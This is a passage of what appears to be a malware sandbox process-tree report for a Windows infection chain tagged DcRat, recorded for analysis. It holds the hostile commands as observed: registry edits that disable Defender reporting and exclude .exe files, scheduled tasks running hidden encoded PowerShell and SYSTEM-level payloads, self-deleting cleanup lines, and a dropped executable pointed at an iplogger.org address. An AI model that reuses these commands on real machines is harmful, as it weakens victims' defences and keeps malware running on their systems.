                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                          10⤵
                                                                            PID:4724
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "ghbixFBUP" /SC once /ST 03:56:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                        8⤵
                                                                        • DcRat
                                                                        • Creates scheduled task(s)
                                                                        PID:5068
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "ghbixFBUP"
                                                                        8⤵
                                                                          PID:4080
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "ghbixFBUP"
                                                                          8⤵
                                                                            PID:5076
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 12:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\vOMCCJB.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                            8⤵
                                                                            • DcRat
                                                                            • Creates scheduled task(s)
                                                                            PID:5216
                                                                    • C:\Users\Admin\Pictures\Adobe Films\SqxEUWFAHrHCWdtUp5Jt44Jq.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\SqxEUWFAHrHCWdtUp5Jt44Jq.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4684
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 340
                                                                        6⤵
                                                                          PID:4856
                                                                      • C:\Users\Admin\Pictures\Adobe Films\Ts54Y9demDiqwyFRX9XtsPd2.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\Ts54Y9demDiqwyFRX9XtsPd2.exe"
                                                                        5⤵
                                                                          PID:1820
                                                                          • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
                                                                            6⤵
                                                                              PID:1352
                                                                              • C:\Users\Admin\AppData\Local\Temp\E1L2G.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\E1L2G.exe"
                                                                                7⤵
                                                                                  PID:1756
                                                                                • C:\Users\Admin\AppData\Local\Temp\D6JFM.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\D6JFM.exe"
                                                                                  7⤵
                                                                                    PID:4344
                                                                                  • C:\Users\Admin\AppData\Local\Temp\BLEC3.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\BLEC3.exe"
                                                                                    7⤵
                                                                                      PID:3728
                                                                                    • C:\Users\Admin\AppData\Local\Temp\9EAF7.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\9EAF7.exe"
                                                                                      7⤵
                                                                                        PID:4548
                                                                                      • C:\Users\Admin\AppData\Local\Temp\77DIC.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\77DIC.exe"
                                                                                        7⤵
                                                                                          PID:3076
                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                            "C:\Windows\System32\regsvr32.exe" -u /S .\n7PM.r6S
                                                                                            8⤵
                                                                                              PID:5156
                                                                                          • C:\Users\Admin\AppData\Local\Temp\77DICLD41JBJKCH.exe
                                                                                            https://iplogger.org/1OAvJ
                                                                                            7⤵
                                                                                              PID:1500
                                                                                          • C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall23410.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall23410.exe"
                                                                                            6⤵
                                                                                              PID:2092
                                                                                              • C:\Users\Admin\AppData\Local\Temp\afcedbff-f54c-4cd7-840d-c2045834bc66.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\afcedbff-f54c-4cd7-840d-c2045834bc66.exe"
                                                                                                7⤵
                                                                                                  PID:1248
                                                                                              • C:\Users\Admin\AppData\Local\Temp\po50.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\po50.exe"
                                                                                                6⤵
                                                                                                  PID:4732
                                                                                                • C:\Users\Admin\AppData\Local\Temp\binwang.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\binwang.exe"
                                                                                                  6⤵
                                                                                                    PID:3564
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\binwang.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\binwang.exe" -h
                                                                                                      7⤵
                                                                                                        PID:4464
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
                                                                                                      6⤵
                                                                                                        PID:4292
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                          7⤵
                                                                                                            PID:4296
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /f /im chrome.exe
                                                                                                              8⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4996
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\database.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\database.exe"
                                                                                                          6⤵
                                                                                                            PID:4432
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe"
                                                                                                            6⤵
                                                                                                              PID:3916
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                              6⤵
                                                                                                                PID:4108
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-70RAI.tmp\setup.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-70RAI.tmp\setup.tmp" /SL5="$80050,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                  7⤵
                                                                                                                    PID:2500
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                      8⤵
                                                                                                                        PID:2456
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-JASOE.tmp\setup.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-JASOE.tmp\setup.tmp" /SL5="$102EC,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                          9⤵
                                                                                                                            PID:2588
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\siww1049.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
                                                                                                                      6⤵
                                                                                                                        PID:4036
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          7⤵
                                                                                                                            PID:2800
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\video.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\video.exe"
                                                                                                                          6⤵
                                                                                                                            PID:2348
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\udontsay.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
                                                                                                                            6⤵
                                                                                                                              PID:4348
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
                                                                                                                              6⤵
                                                                                                                                PID:3900
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:1260
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\anytime1.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:1400
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\anytime2.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:5248
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\anytime3.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:5532
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                    4⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:4200
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                    4⤵
                                                                                                                                    • DcRat
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:5008
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\exz_y5si_QKvgV12SHnOl8Vv.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\exz_y5si_QKvgV12SHnOl8Vv.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:2712
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 460
                                                                                                                                    4⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:3860
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\ikj0nXK63Ad1yKimPNaQT2y7.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\ikj0nXK63Ad1yKimPNaQT2y7.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Modifies system certificate store
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:4004
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                    4⤵
                                                                                                                                      PID:1368
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                        5⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:1904
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\TsgtelzQlR8yszDLuNQJXLZi.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\TsgtelzQlR8yszDLuNQJXLZi.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:624
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 624 -s 460
                                                                                                                                      4⤵
                                                                                                                                        PID:4536
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\k93jCTkUiMxXJrGKLIDgegDv.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\k93jCTkUiMxXJrGKLIDgegDv.exe"
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:828
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 468
                                                                                                                                        4⤵
                                                                                                                                          PID:4020
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\DP8IfkWhlAypXNjWbEMYhZ4_.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\DP8IfkWhlAypXNjWbEMYhZ4_.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:1920
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS41C4.tmp\Install.exe
                                                                                                                                          .\Install.exe
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2996
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS4DF9.tmp\Install.exe
                                                                                                                                            .\Install.exe /S /site_id "525403"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:632
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                              6⤵
                                                                                                                                                PID:4936
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                  7⤵
                                                                                                                                                    PID:4816
                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                      8⤵
                                                                                                                                                        PID:4856
                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                        8⤵
                                                                                                                                                          PID:4924
                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:4372
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                          7⤵
                                                                                                                                                            PID:3484
                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              8⤵
                                                                                                                                                                PID:3708
                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:3564
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /CREATE /TN "gKaNYAGSP" /SC once /ST 00:25:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                              6⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:4960
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /run /I /tn "gKaNYAGSP"
                                                                                                                                                              6⤵
                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                              PID:4296
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /DELETE /F /TN "gKaNYAGSP"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:644
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 12:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\HAxYUrE.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                                                                6⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:4344
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\7IvlM80nh6MBRPFCXBxzF_BS.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\7IvlM80nh6MBRPFCXBxzF_BS.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4448
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Pictures\Adobe Films\7IvlM80nh6MBRPFCXBxzF_BS.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2160
                                                                                                                                                              • C:\Windows\system32\choice.exe
                                                                                                                                                                choice /C Y /N /D Y /T 0
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1856
                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\CQPxSqqh31frdIRtYHOHcDzh.exe
                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\CQPxSqqh31frdIRtYHOHcDzh.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:836
                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\alUpx83J0MdcnebF4CuYOIst.exe
                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\alUpx83J0MdcnebF4CuYOIst.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2788
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1852
                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\GjqJZ2_aVPLTP4_PI3IJUpKf.exe
                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\GjqJZ2_aVPLTP4_PI3IJUpKf.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4296
                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Rcy3rf9yZ0fpvi47hqv6iRFs.exe
                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Rcy3rf9yZ0fpvi47hqv6iRFs.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:3508
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 468
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4540
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 476
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4744
                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ekfdxVPEJxh3DEsyozUTNiCv.exe
                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ekfdxVPEJxh3DEsyozUTNiCv.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:3020
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 468
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3868
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\FJjQVURla01Xh9fpC6JaU94b.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\FJjQVURla01Xh9fpC6JaU94b.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:2520
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\0wAdZf4lpfzXIpVqVgHL8rW_.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\0wAdZf4lpfzXIpVqVgHL8rW_.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      PID:384
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 652
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:4148
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 800
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2392
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 1288
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5092
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 1296
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:4208
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 1324
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3500
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "0wAdZf4lpfzXIpVqVgHL8rW_.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\0wAdZf4lpfzXIpVqVgHL8rW_.exe" & exit
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4840
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /im "0wAdZf4lpfzXIpVqVgHL8rW_.exe" /f
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:4852
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 384 -s 1292
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2088
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3944 -ip 3944
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2392
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3944 -ip 3944
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3140
                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                    PID:4964
                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      PID:3568
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 600
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        PID:3784
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3944 -ip 3944
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3436
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3568 -ip 3568
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4992
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3944 -ip 3944
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:944
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3944 -ip 3944
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4028
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3944 -ip 3944
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4244
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3944 -ip 3944
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:960
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3944 -ip 3944
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1364
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3944 -ip 3944
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3128
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3944 -ip 3944
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4208
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3944 -ip 3944
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4580
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3944 -ip 3944
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5064
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3944 -ip 3944
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4868
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3944 -ip 3944
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:1984
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3944 -ip 3944
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:2344
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3944 -ip 3944
